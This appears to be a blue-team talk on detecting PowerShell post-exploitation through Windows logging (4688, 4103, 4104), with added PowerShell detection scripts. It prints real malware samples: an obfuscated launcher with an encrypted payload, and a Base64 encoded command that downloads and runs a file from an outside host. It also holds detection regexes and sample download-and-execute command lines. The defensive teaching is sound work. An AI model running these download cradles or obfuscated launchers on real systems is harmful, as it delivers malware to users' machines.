PowerShell post-exploitation, the Empire has fallen: You CAN detect PowerShell exploitation
Michael Gough
MalwareArchaeology.com
Who am I
• Blue Team Defender Ninja, Malware Archaeologist, Logoholic
• I love “properly” configured logs – they tell us Who, What, Where, When and hopefully How
Creator of
“Windows Logging Cheat Sheet”, “Windows File Auditing Cheat Sheet”, “Windows Registry Auditing Cheat Sheet”, “Windows Splunk Logging Cheat Sheet”, “Windows PowerShell Logging Cheat Sheet”, “Malware Management Framework”
NEW - “Windows HUMIO Logging Cheat Sheet”
• Co-Creator of “Log-MD” – Log Malicious Discovery Tool
– With @Boettcherpwned – Brakeing Down Security PodCast
• Co-host of “Brakeing Down Incident Response” podcast
• @HackerHurricane also my Blog
The Challenge
PowerShell Exploitation
• Malware loves to use PowerShell to download and launch payloads
– They try and hide it too
• Red Teamers love PowerShell
– They love to hide too
– It is already built into the OS
• But they DO make noise and CAN be detected
– If you know how
So where do we start?
Check Your Settings
What is set? What version?
• What version of PowerShell are you running? (and is the v2 engine still installed next to v5?)
• Is logging enabled? (Module, Script Block, Transcription, and Process Command Line in 4688)
• Are you using a PS v2 profile.ps1 to set logging?
• What is your Execution Policy?
• How can you check?
Audit with LOG-MD
• We give you a report
Enable Logging
PowerShell has Logs!
• You MUST enable them, they are not configured by default ;-(
• “Windows Logging Cheat Sheet” (CMD LINE – Process Command Line in the 4688 event)
• “Windows PowerShell Logging Cheat Sheet”
– Follow the guidance
– MalwareArchaeology.com/cheat-sheets
• Module Logging – Pipeline Execution Details (Windows PowerShell 800 and PowerShell/Operational 4103)
• ScriptBlock Logging (PowerShell/Operational 4104)
• Transcripts if you want – text files in the OutputDirectory you set, not events
• Profile.ps1 for PS v2 – $LogCommandLifecycleEvent and friends turn on the 500 events
– -NoP (no Profile) will bypass this ;-(
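Checking the settings the previous slide asks about, then enabling the logs this slide lists, on a single host. This is an added example, not code from the slides or from LOG-MD (which produces the same answers as a report): the registry values are the machine-local equivalents of the Group Policy items the cheat sheets point you to, the transcript directory and the 1 GB Operational log size are assumptions, and it has to run from an elevated Windows PowerShell prompt.

```powershell
# Added example: audit, then enable, PowerShell logging on one host.
# Registry paths are the local equivalents of the Group Policy settings; use a GPO
# for a fleet. Run elevated in Windows PowerShell 5.1.
$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
$AuditKey   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
$OpLog      = 'Microsoft-Windows-PowerShell/Operational'

function Get-RegValue {
    # $null when the key or value is absent, instead of a terminating error.
    param([string]$Path, [string]$Name)
    $key = Get-Item -Path $Path -ErrorAction SilentlyContinue
    if ($key) { $key.GetValue($Name) } else { $null }
}

function Get-PSLoggingState {
    # Answers the slide's questions: version, v2 engine present, which logging is on, execution policy.
    try   { $v2 = (Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction Stop).State }
    catch { $v2 = 'unknown (client SKUs only; on Server use Get-WindowsFeature PowerShell-V2)' }
    [pscustomobject]@{
        PSVersion            = $PSVersionTable.PSVersion.ToString()
        V2EngineFeature      = $v2                                                                  # Disabled is what you want
        ExecutionPolicy      = (Get-ExecutionPolicy -List | ForEach-Object { "$($_.Scope)=$($_.ExecutionPolicy)" }) -join '; '
        ModuleLogging        = Get-RegValue "$PolicyRoot\ModuleLogging" 'EnableModuleLogging'            # 1 = 800 + 4103
        ModuleLoggingNames   = Get-RegValue "$PolicyRoot\ModuleLogging\ModuleNames" '*'                  # '*' = every module
        ScriptBlockLogging   = Get-RegValue "$PolicyRoot\ScriptBlockLogging" 'EnableScriptBlockLogging'  # 1 = 4104
        Transcription        = Get-RegValue "$PolicyRoot\Transcription" 'EnableTranscripting'
        TranscriptDirectory  = Get-RegValue "$PolicyRoot\Transcription" 'OutputDirectory'
        CmdLineIn4688        = Get-RegValue $AuditKey 'ProcessCreationIncludeCmdLine_Enabled'            # 1 = CommandLine field filled
        ProcessCreationAudit = (auditpol /get /subcategory:'Process Creation' | Select-String 'Process Creation') -replace '\s{2,}', ' '
        OperationalLogMaxMB  = [int]((Get-WinEvent -ListLog $OpLog).MaximumSizeInBytes / 1MB)
    }
}

function Enable-PSLogging {
    param(
        [string]$TranscriptDir = 'C:\PSTranscripts',   # assumption: a directory users can append to but not read or modify
        [long]$OperationalLogBytes = 1GB               # assumption: 4104 is chatty, the default 15 MB rolls over in hours
    )
    foreach ($sub in 'ModuleLogging\ModuleNames', 'ScriptBlockLogging', 'Transcription') {
        New-Item -Path "$PolicyRoot\$sub" -Force | Out-Null                      # creates missing parent keys as well
    }
    New-ItemProperty -Path "$PolicyRoot\ModuleLogging" -Name EnableModuleLogging -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path "$PolicyRoot\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null
    New-ItemProperty -Path "$PolicyRoot\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -PropertyType DWord -Force | Out-Null
    # EnableScriptBlockInvocationLogging (4105/4106) is left off on purpose, as the slides advise.
    New-ItemProperty -Path "$PolicyRoot\Transcription" -Name EnableTranscripting -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path "$PolicyRoot\Transcription" -Name EnableInvocationHeader -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path "$PolicyRoot\Transcription" -Name OutputDirectory -Value $TranscriptDir -PropertyType String -Force | Out-Null
    # 4688 with the command line: the audit subcategory plus the "include command line" policy.
    New-Item -Path $AuditKey -Force | Out-Null
    New-ItemProperty -Path $AuditKey -Name ProcessCreationIncludeCmdLine_Enabled -Value 1 -PropertyType DWord -Force | Out-Null
    auditpol /set /subcategory:'Process Creation' /success:enable | Out-Null
    wevtutil sl $OpLog /ms:$OperationalLogBytes
}

Get-PSLoggingState | Format-List
# Enable-PSLogging            # uncomment once the assumptions above match your environment
# Get-PSLoggingState | Format-List
```

Run the audit first and keep the output; the before/after pair is the evidence that a host is actually producing 800/4103, 4104 and command-line 4688 events rather than just being told to. A v2 engine that still reports Enabled is the gap the "upgrade to v5" slides are about: powershell.exe -Version 2 side-steps the policy-driven logging entirely.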
PS Event IDs – Windows PowerShell
(event ID table, from www.eventsentry.com/blog/2018/01/powershell-p0wrh11-securing-powershell.html)
PS Event IDs – PowerShell/Operational
• 4105 and 4106 (script block start/stop, only written when Script Block Invocation Logging is also on) too, but WAY too noisy to be of any value
(event ID table, from the same EventSentry post)
Typical Malware
What is Malware Using?
• LOTS of PowerShell
– In most malware we see
– Hearing it a lot in targeted attacks
– Living off the land, all the files are already there
– Just add script/commands and run
• PenTesters, The RED TEAM also loves them
• There are LOTS of PS post-exploit kits
Post-Exploitation Kits
• PowerSploit
• PowerShell Empire (PowerShellEmpire / EmpireProject)
• BloodHound
• PSRecon
• PowerShell-Suite
• PowerTools
• Powershell-C2
• And more…
BLUE TEAM Baby - DETECTION!
4688 - Process Create (Security Log)
Typical Malware launching PowerShell
1. User opens the MS Word document (the macro runs inside WINWORD.EXE)
2. Word calls CMD.exe
3. CMD calls PowerShell, which downloads the dropper
4. PowerShell calls the Malware
5. The Malware calls a 2nd copy of itself
• Every hop is its own 4688 Process Create, and each child's 4688 names its creator (by PID everywhere, by name too on Windows 10 / Server 2016 and later), so the whole chain is in the Security log
This PowerShell looks odd
• cmd jwaMLXnC iTahsHIpaITIFJCDLrOwoC XwSDfYdvV & %C^om^S^pEc% %C^om^S^pEc% /V /c set %LkOzPNSShSlqiXU%=HkMCjGoAjaAcJ&&set %var1%=p&&set
%var2%=ow&&set %AhUBjnMNLHEFDPI%=pRLBAwJEiiE&&set %var7%=!%var1%!&&set %vNQpMqIhkQoukIa%=cHwdrjXtIoaIBY&&set %var3%=er&&set %var8%=!%var2%!&&set
%var4%=s&&set %QSAiRAvRrPuhXMB%=ataDjzmFNO&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "(nEW-ObJECT
ManAGEMEnT.AuToMATIoN.PsCReDEntIAl ' '. (
'76492d1116743f0423413b16050a5345MgB8AGYAZgB2AFEAYgBtAEwAUQB5AEUAbgAwADkAUQA3AFkAUQBuAEcAVwBxAHcAPQA9AHwANAA1ADMAMQBiADkAMQAzADUAYwBiAD
EAZAA2ADMAMgA5AGIANABhADQAZQA1ADUAZgA1ADMAZQA4ADYAZQBiADgAYQAyAGUAZgA3ADYANABkAGUANQBjADMAMQA3AGQAZgA5ADcAZABjAGUANwA4AGMAZAA4AD
kAOAA0ADAAOQA4ADgANAA2AGUAYgA0ADAAMQA3ADUAYgA5AGMANwAwAGEANgA3ADIANQAyADEANgBmADQAZQA3ADcAZgA4ADMAMABkAGMAOABhAGQAOQA2AGIAZQAx
AGMAZQBhADYAMwAxAGUAMQAzAGEANQA0ADgAYwBmADMAMQA1ADgANAAyADEAOABiAGQAOABjADAAOAAzAGUAOQA3ADIAYwA4AGIAZgBhADAAMQA1ADkAYQBjAGMAN
ABlAGUAMABlAGUAMQBjADcAZQBhADMAZQBlAGEAMQBlADkANABkADYAOAAzAGEAYQA3ADcAMQBiADQAYwA5AGUANgBkAGMAYQBmADkANAA5ADYAMgBiADYAYwBkADMA
OQA3ADEAZgA1AGYAYwBjADAAZQBiAGQAOAAzADQAOAA4AGMAZQA3AGMAZABjAGIAYQBiAGYAZAA4ADgAOQBiADgAOAAyADcANwAwADcANAA0ADIAZAAyADMAZQAwADMAO
QBlADUANQA1ADUAMQBiADUAZgAxADgAOAA1ADcANgA5ADMANABkADkANAAzADUANwAzADgAOQA3ADAAMABiAGUAMwBiAGYAMwA1ADEAMQBiAGEANgBiADYAYgAwADUA
NQAxAGUANAA3ADUAMgBjAGUANAA4ADgAYQBiADYAMQA3ADUAOQBkADEAZQA1ADUANAA3ADUANwA2ADYAOABlADgANwBmAGMAMQAzADQANwBmAGEANgA4AGUAMwA0
ADAANwBmADAANQBiADkANwAyAGEANAA3ADIAZAA3AGIAMgAxADYAYwBmADAAMwA0ADYAYwA2ADYAYgAxADkAMQA3AGUAYgA0ADkAOABiADUANgAyADgAMQBmADQAYgA
2ADYAMQAyAGMAOQAxAGEAOQA5AGEANQBiADcAYgBhAGQAYgA1ADgAZQBiAGMAZgA4AGEAMQA2ADAANgAzADkAMwBjAGIAMgA4ADcANwA3ADIANAAxADcANgAwADEAZQA2
AGQAMwBiAGYAMgBhADEAMQAxADMAYQAyAGUAOQBmADIAYgA4AGUAZQA0ADUAMwBmAGYAYwAzAGIAMABiAGMAYwAyADYANQBmADcAMgAzAGUAYgBmAGQAYgA1ADQA
OAAwADEANAA3ADcAZgAyAGQAZAA4AGUAYgBhAGYAOQA1ADMAMgA5AGEANgA2ADQANwAwAGUANwAzADMAZQBlADgAMgBjAGEAYwAzAGQAOQBhADQAYQA4ADAAMgAwA
GQAOABkAGMANwAxADAANQA5ADEAYwBkAGIAYgA4ADMANgAwADYAZQBkAGYAMAA4ADgAMwBmADUANABhAGYAOABmADgANQAyADAAMQA4ADYAYwAxADMAMQBiADkAZ
gA4AGIAZQAzADQAZgA5AGYAMQBkADcAOQA4AGIAZgAxADcAOAAxADMAOAA5ADEANQAxAGQAYQBjADIAYwAxADcAMAAwADEANwAzADgAMQA4ADgAMgA0ADMAMwBmADMA
ZQBkADUAMAA4ADYAYQBiADIAYgAxAGEAYgA3ADMAMAAxADAAMABhADIAYwA1AGYAZgA0ADkAYgBiADkANwBjAGMANwBkADgAMQAzADUAMAAxADAAZQBmAGEAMQAyADQA
OQBhAGMAMQBkAGYAZgBjAGEAZgBiADYAMAA2ADUAOABhAGYANwAzADEAOQAzADEAZQBhADUANwA4AGMAYQBmADEANwAxADEAOAA1ADgANgA0ADkANABjADYAMABkAGU
AYgA2AGUAMQBlAGIAMgA5ADkAYQAwADAANgA1ADAANgAxADYANgBkADUAYwA2AGIAYgAyAGYAMAA0ADYAYgBlADAANwA1AGQAOQAxADcAOABmAGMAOAA2ADEAMQA4ADc
AMAA3ADcAYwA0AGUAYgA2AGIAOQAyADMAYgBhADgAMQBlADAAOQA3ADgANgBkAGIAYwA4ADEAMgA2ADQAZgA5AGMAOQAwAGYAZAAwADQAYQBkAGUAOAA1ADkAZQBlAD
UANwA2ADgANAA4ADkANQBiADgAMgAzADMAMgAwAGUAYgA1ADMANQBiAGUANAA5AGMAYgA4ADAAYQA4AGQANABiAGEAMwA1ADQAMwBhADAAMQA3AGYAYwAwADMAY
wA3ADEAYwAyADQAZQBlAGMAOQBmADkAMgA0AGMAYQAyAGMANgA2AGQAOABlADQAOAA5ADUAMwBjADQAZABkADIAZQA2ADQAYQAzADgANAAxADcAOABmAGMAMABhAG
QANgAyADIANwA4ADQAYQA2AGYANABiADgAMQA4ADcAYgAwADgAZABmADgAMQA0AGMAYwBhADcAYgBlAGEAOQAyADcAMgBiADcAOAAxADkAMQBiADcAZAAwADUANgA0AG
QAMwAzAGYAMQBjADgAOQBiAGUAZQA3ADgAZAAxAGIANwA1AGMAMQA2ADIAOQAyADMAMAA3ADcAZgA4ADEAZAAyADQAZABkAGUANwBlAGYANAA1ADAANABkADUAMgAxA
DEANgAxADgAZQBjAGUAMwBlADUAMQAyADgANABlADEANwA4ADYAZABlADIAMgA5ADAAYgAwADYANAA2ADAAZQA2ADIAMQBlADQAYwA5ADAAZAA0ADgAOAA4ADgANgA5ADc
ANAA2ADMAYwBjADIAOABlADYAYwBiADYAMwA2AGUAMAAxADEAZgA2AGMAYgAzAGUANwBjADIAMABmADcANgAwADgAMgA4AGYAZAA5ADgAOQBjADMAZgBiAGUAYgA4ADkA
MQA4AGIANwA2ADYAYgBhAGMAMQA4ADUAMAAwADMAMQAyADEAYQA2ADUAMQBhADQANABlADAAMQA5AGYAZQAxADcAZgBjADIANQBjADgANgA3ADUAOQA0ADIANwA4AD
cAYgA1ADUAYgA0ADAANAA0ADkAMgBhAGMAZQBmAGEAZAAwAGEAZQBjAGIAMQBkAGEAMwAzADEAMABlADMAOQAyADAAZABkADMAMQA1ADQAMgA4ADEAMABlADQAZgAx
AGIAZAAyADkAZgA2ADIAMwBkADAAMgBjAGQAYgBlADYAMgBkADEAYwBjADMAMwBhADUANgA2AGIAMQA1ADMAYwA3ADMANQA4AGEAYwAyADkAOAA3AGUANQBmAGYAOAA
3ADMAZQA1AGMAOQBkAGQAYwBiADcAMQA1ADAANwAwAGUAYwAwAGIANAA3ADQANwAwADMAMAA2ADEAOQAxADcAOAA0AGUANQA4ADgANgBlADAANQA3AGQANwAxAGI
ANAAyAGQANgA2ADUAOQA0ADkAMAA1ADkANQBkADQAZgBhAGUANAAzADUANQA4ADQAMwBkAGIAMwBhAGQAZgA5ADEAYgA3ADcAMABhADMAYQA2AGUAYQAwADkANwAx
AGMAYQA3AGIANAAwADkANgA2AGYAMQA1ADcANQA1AGMAYQA3AGYAMQA2AGIANgAyADAAMAA4ADEAYgAwADcAZQBhADUAYQBjAGQAOQBhADUAZgAzAGMANQBiADIANQA
yADQAOAA2ADgANwA0ADgANgAyADIAYwAxADQAYgBlADgAZAA3ADUANAA5AGQAZQA5ADkAMAAwADkANwBjADcAMABkAGQAMgBiADcAMABiADEAYwBjADAANgBkADIAYgA4A
DYAMQAyADUAMgA2ADgAMAA0AGEAYQBlAGMANAAxADUAZQAxADEAOAAzADgAZgA0ADIAMgA3ADEAYQBiAGYAOABhADAAMgBiADkANwA0ADMAOQAwAGQAMgA2ADMAYwB
kADYAYQA4ADAANgA1ADgAMgBlAGEANwA3AGQAMQAwADQAYQBhAGQAOABlADgANQBlAGMAZQA1ADAAZABkAGIANQAwAGEAYgBmAGMAOAAzADAAMwBlADUAMgBiADYAY
wBiAGMAMwBjADAAZAAzADEAZQBiAGMAYwAxAGMAMgBjADAAMwAzADEAMgAzAGYAYwBkAGMANgA1AGMANwA0AGUANQA4ADYAMQA5AGYAZAA0ADgAMQA3AGUANQA4A
DUANwBlADgAZQAxAGUAOQA1AGMAZgBjAGQAMwBkADMAZgBmADgAMwBjADEAMAA4ADgANAA5ADMAYwBmADAAMAAzADUAYwBkADEAZAAxADkAMAAxADYANgA4ADgAMQ
A5AGIAOQBiADkAMwAzADUAMgA4ADAAOAAxAGQAZQBkAGEAYwA0ADIAMwBiADUANAAwADQAMgAzADMANwBlAGEAZQA4ADgAMgAwADEAYQAyAGQAMAA2AGYAZQA3ADYA
YQAwADEANQBjAGUAZQA5ADAAMABkAGMAMAA2AGIAZQBhADAANwBiADQAMQBjADAAZQAyAGUAOQAyADAAZgAyAGUAYgBmADQANAA0ADIAZAA2AGYAOAAwAGUAYQA3AD
kANwA1ADcAOABjADUANgA0ADAANgAwAGYAYgA0ADUANwBjAGYAOAAxADUAOAA1AGUAZAA5ADEANABjADAAMAAyADcAOAA5ADIAZQBiAGQAMABlADUAMAA2ADkAZAAyADc
AMwAxAGEAOAA4ADcAZQA1AGIAMAAzADcAYgBiAGQAMABjAGYAOAA0ADQAYQAyADEANwA0ADAAYgA2AGMAMgA4ADMAOQAxAGIAOQBmADMANgBlADQAMABjADAAMQA1A
DYAYgA4ADQAMwA5AGMANwBhADYANABhAGUAYgA3ADUAZgBmAGYAMgBhADAAYQBiAGQAZQA3ADUAZgBiADMAMQA4ADcAMQA5AGYAZAAyADkAZAAxAGMANQA3AGEAYgA
wADcANAA2AGUAMQA1ADEAYQBlAGMAZgAwAGMAZAA0ADQAYgAwAGQAMwA2ADAAMQBhAGEAYQA4ADkAZgBhADEAMwBjADAANQA3ADgANgAyAGQAMQAxAGIAZgA2AGMA
NQBhADkAOABhADIAOAA0AGEANgBhADIAYgBkAGYAYQBhAGUANwA0AGYAOQBjADAAZABkADMAYwBiADAAZgBjAGIAMgAyADUAMgBiADEAZgA1ADcAMQAxAGEAYwAxAGMANw
A3ADIANQAxADgAOAAxAGUAYQAxAGQAZQBkADAAMQA3ADEAZAAwADcANQA0ADcAMAAxADIANgAzADcAMgBiADcANwBkADgAMQAyAGQAYgBiAGEAZAA4ADEAZgAzADgAZABk
ADcAZAA2ADcANQA5AGYANwBiADMA'|CONVerttO-SecuresTrInG -ke 150.105.213.121.221.126.137.121.68.30.46.202.28.13.28.138 )
).gETNEtwORkCrEdeNTIaL().pasSwoRD|.((vAriabLE '*mdR*').NAME[3.11.2]-JOin'')
Did that look normal?
• 4688 will show you the Process execution
– What called what
• What called PowerShell, and the parents above
– Word > CMD > PowerShell = Always BAD
• What did PowerShell logging catch?
– That big blob looked interesting
• What the command above is doing, read from the 4688 command line alone:
– cmd spells “powershell” out of environment variables (%var1%..%var6% = p, ow, er, s, he, ll) and hides ComSpec behind carets (%C^om^S^pEc%), so a plain search for the word powershell misses the launch
– The payload is stored as a ConvertTo-SecureString encrypted string (the 76492d1116743f0423413b16050a5345 prefix) and decrypted with the hard-coded 16-byte -Key, then read back as plaintext through PSCredential.GetNetworkCredential().Password
– (Variable '*mdR*').Name[3,11,2] -join '' pulls i, e, x out of the built-in variable MaximumDriveCount, and the leading dot invokes the result: that is Invoke-Expression without ever writing iex
– The comma separators in the -Key bytes and in the [3,11,2] index list render as dots in the slide text above
4688 - PowerShell Bypass (Security Log)
PowerShell Bypasses
• -W Hidden (-WindowStyle Hidden: hide the window YOU would see)
• -NoP -sta -NonI -W Hidden (-NoProfile, single-threaded apartment, -NonInteractive, hidden window)
• -Exec Bypass / -EP Bypass (-ExecutionPolicy Bypass: ignore the execution policy for this process)
• -NoL (-NoLogo) and -Enc (-EncodedCommand) turn up in the same launches
They do this to hide what you see
• Bypass
• Hidden Window
• 4688 will capture this behavior
– Enabling Process Command Line is key; without it 4688 shows only powershell.exe and its parent
• -NoProfile stops profile.ps1 from loading in case there is any logging set in it (the v2 approach), -WindowStyle Hidden hides the window, and -ExecutionPolicy Bypass ignores any execution policy
– The execution policy was never a security boundary, so Bypass is a tell, not a privilege
• YAY Microsoft.. Allows built-in bypasses
• LOTS of ways to spell the bypasses
– Switches are case-insensitive and any unambiguous prefix works: -nop / -NoPr / -NoProfile, -w / -win / -WindowStyle, -ep / -ex / -exec / -ExecutionPolicy, -e / -ec / -enc / -EncodedCommand
– Match on the short forms, not the full words
PowerShell Logs show it too
• Windows PowerShell log (v2-v5) 400 and 600
– The HostApplication field of the 400 event carries the full powershell.exe command line, switches included, on every version
• Windows PowerShell 500 IF command lifecycle logging is enabled in profile.ps1
– But -NoP will not load profile.ps1, making this basically worthless
– And WHY upgrading to PowerShell v5, where logging is set by policy and not by the profile, is so important
• Windows PowerShell 800 (Pipeline Execution Details, written once Module Logging is on)
Security Log - 4688: PowerShell Web Calls
Fetch !!!
• The malicious payload must phone home to get the dropper
• System.Net.WebClient (DownloadString, DownloadFile, DownloadData)
• Invoke-WebRequest (iwr, and the curl / wget aliases in Windows PowerShell), Invoke-RestMethod, Start-BitsTransfer
• http:// or https:// in a command line that has no business containing one
• -Enc or -EncodedCommand, and IEX / Invoke-Expression to run whatever came back
• There are lots of ways to spell PS commands ;-(
• 4688 will show them IF in the clear
• Sometimes obfuscated
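The three 4688 checks above (the Word > cmd > PowerShell chain, the launch-time bypass switches in every spelling powershell.exe accepts, and the download buzzwords) run over a batch of process-creation records, as an added example that is not code from the slides or from LOG-MD. The Office host list and the scoring are assumptions, the sample events are constructed, and the parent link uses only the creator PID that every 4688 carries; Get-Recent4688 at the end shows how to feed it real events.

```powershell
# Added example: pick the malicious launch out of a batch of Security 4688 records using
# only fields every 4688 has (new process name, creator PID, command line). Sample records
# are constructed; Get-Recent4688 maps live events into the same shape.
$OfficeHosts   = 'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe', 'msaccess.exe'   # assumption: your Office set
$PowerShellExe = 'powershell.exe', 'powershell_ise.exe', 'pwsh.exe'

# powershell.exe takes any unambiguous, case-insensitive prefix of a switch, so the
# patterns key on the shortest accepted form rather than the full word.
$BypassPatterns = [ordered]@{
    NoProfile      = '\s-nop\w*'                                  # -NoP, -NoProfile
    NonInteractive = '\s-noni\w*'                                 # -NonI, -NonInteractive
    HiddenWindow   = '\s-w(?:i\w*)?\s+(?:hidden|1)\b'             # -w hidden, -WindowStyle Hidden
    ExecBypass     = '\s-e(?:p|x\w*)\s+(?:bypass|unrestricted)\b' # -ep bypass, -exec bypass, -ExecutionPolicy Bypass
    EncodedCommand = '\s-e(?:c|n\w*)?\s+[A-Za-z0-9+/=]{40,}'      # -e, -ec, -enc, -EncodedCommand <base64>
}
$WebCallPattern = 'Net\.WebClient|Download(?:String|File|Data)|Invoke-(?:WebRequest|RestMethod|Expression)|Start-BitsTransfer|https?://|\b(?:iwr|irm|iex|curl|wget)\b'

function Get-Ancestry {
    # Walk creator PIDs back to the oldest record we hold. PIDs are reused over time, so in
    # production limit the join to events close together in time (assumption: one batch here).
    param($Record, [hashtable]$ByPid)
    $chain = @([IO.Path]::GetFileName($Record.NewProcessName))
    $seen  = @{}
    $cur   = $Record
    while ($cur.ProcessId -and $ByPid.ContainsKey($cur.ProcessId) -and -not $seen[$cur.ProcessId]) {
        $seen[$cur.ProcessId] = $true
        $cur   = $ByPid[$cur.ProcessId]
        $chain = @([IO.Path]::GetFileName($cur.NewProcessName)) + $chain
    }
    return $chain
}

function Test-Process4688 {
    # $null for anything that is not a PowerShell host; otherwise chain, findings and a score.
    param($Record, [hashtable]$ByPid)
    $image = [IO.Path]::GetFileName($Record.NewProcessName).ToLower()
    if ($image -notin $PowerShellExe) { return $null }
    $chain    = Get-Ancestry $Record $ByPid
    $lower    = $chain | ForEach-Object { $_.ToLower() }
    $findings = New-Object System.Collections.Generic.List[string]
    if ($lower | Where-Object { $_ -in $OfficeHosts }) { $findings.Add('Office ancestor') }
    if ($lower -contains 'cmd.exe')                    { $findings.Add('cmd.exe in chain') }
    foreach ($name in $BypassPatterns.Keys) {
        if ($Record.CommandLine -match $BypassPatterns[$name]) { $findings.Add($name) }
    }
    if ($Record.CommandLine -match $WebCallPattern) { $findings.Add('web call / IEX') }
    [pscustomobject]@{
        Score       = $findings.Count
        Chain       = $chain -join ' > '
        Findings    = $findings -join ', '
        CommandLine = $Record.CommandLine
    }
}

function Get-Recent4688 {
    # Live Security 4688 events, read by field name (NewProcessId, ProcessId = creator PID, ...).
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) } |
        ForEach-Object {
            $x = [xml]$_.ToXml(); $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{ NewProcessId = $d.NewProcessId; ProcessId = $d.ProcessId
                               NewProcessName = $d.NewProcessName; CommandLine = $d.CommandLine }
        }
}

# Constructed 4688-style records (hex PIDs, as the Security log writes them).
$Events = @(
    [pscustomobject]@{ NewProcessId = '0x1a40'; ProcessId = '0x0e10'; NewProcessName = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'; CommandLine = '"WINWORD.EXE" /n invoice.docm' }
    [pscustomobject]@{ NewProcessId = '0x1b04'; ProcessId = '0x1a40'; NewProcessName = 'C:\Windows\System32\cmd.exe'; CommandLine = 'cmd /c powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/a'')"' }
    [pscustomobject]@{ NewProcessId = '0x1b40'; ProcessId = '0x1b04'; NewProcessName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/a'')"' }
    [pscustomobject]@{ NewProcessId = '0x0b80'; ProcessId = '0x0400'; NewProcessName = 'C:\Windows\explorer.exe'; CommandLine = 'C:\Windows\Explorer.EXE' }
    [pscustomobject]@{ NewProcessId = '0x0c20'; ProcessId = '0x0b80'; NewProcessName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell.exe -File C:\Corp\Scripts\Inventory.ps1' }
)
$ByPid = @{}; foreach ($e in $Events) { $ByPid[$e.NewProcessId] = $e }
$Events | ForEach-Object { Test-Process4688 $_ $ByPid } | Where-Object { $_ } | Sort-Object Score -Descending | Format-List
# Live: $live = Get-Recent4688; $idx = @{}; $live | ForEach-Object { $idx[$_.NewProcessId] = $_ }
#       $live | ForEach-Object { Test-Process4688 $_ $idx } | Where-Object { $_.Score -gt 0 }
```

The constructed maldoc launch scores six findings (Office ancestor, cmd.exe in the chain, -nop, -w hidden, -ep bypass and the WebClient download) while the explorer.exe > powershell.exe -File launch scores zero, which is the separation you alert on. Keep the chain walk even on Windows 10, where 4688 also names the parent: the grandparent (Word behind cmd.exe) is only reachable through the creator PID.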
Base64 Encoded
• Another way to hide from the “Process Command Line” 4688 event
– No bypass words to check for… Silly hackers… It is still easy to spot: one long run of Base64 characters right after -e / -ec / -enc / -EncodedCommand
– The blob is Base64 of the script as UTF-16LE text, which is why every other decoded byte is 0x00 and why a plain ASCII Base64 decode of it looks like garbage
• POWeRshEll -enCodedCOMmaNd
– ZgB1AG4AYwB0AGkAbwBuACAAaQBlAFcATABkAFcAQQB3AHQASABpAEYAZABmAEMAUwBPAHMATQBiAHM
AdwBzAGUAZgAgACgAIAAkAFgARABKAFEAaABXAGYAcQBWAHUAWABvAFIASQAgACwAIAAkAHMAYgBUAGYA
TwBUAHQAbQBKAHMAaQBFAFkAVgBZAHgAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AH
MAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpA
GwAZQAoACAAJABYAEQASgBRAGgAVwBmAHEAVgB1AFgAbwBSAEkAIAAsACAAJABzAGIAVABmAE8AVAB0AG
0ASgBzAGkARQBZAFYAWQB4ACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZ
QBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIA
AkAHMAYgBUAGYATwBUAHQAbQBKAHMAaQBFAFkAVgBZAHgAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgB
rAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEgAWQBs
AFoAYgBVAFcAZwBGAHYAUABZAGkAZwA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAn
AFwASwBkAG0ATwBiAFEAWgBWAEIAeQBRAHAAdgBCAFMAUQBpAHoAcAAuAGUAeABlACcAOwANAAoAaQB
lAFcATABkAFcAQQB3AHQASABpAEYAZABmAEMAUwBPAHMATQBiAHMAdwBzAGUAZgAgACcAaAB0AHQAcA
BzADoALwAvAGMAbwBtAGYAeQAuAG0AbwBlAC8AeQBiAG4AdwBpAGYALgBqAHAAZwAnACAAJABIAFkAbAB
aAGIAVQBXAGcARgB2AFAAWQBpAGcAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=
• Base64 does not always need the = (padding is only there when the byte count is not a multiple of 3), so match on a long run of [A-Za-z0-9+/] rather than on a trailing =
Manual Translation
• On a website… but do it locally: pasting a live payload into a public decoder hands your IOCs to a third party, and a UTF-16LE Base64 decode in PowerShell, or an offline copy of CyberChef, does the same job on any analyst box
PowerShell Log - 4104
Script Block Logging
Translated… Fetch
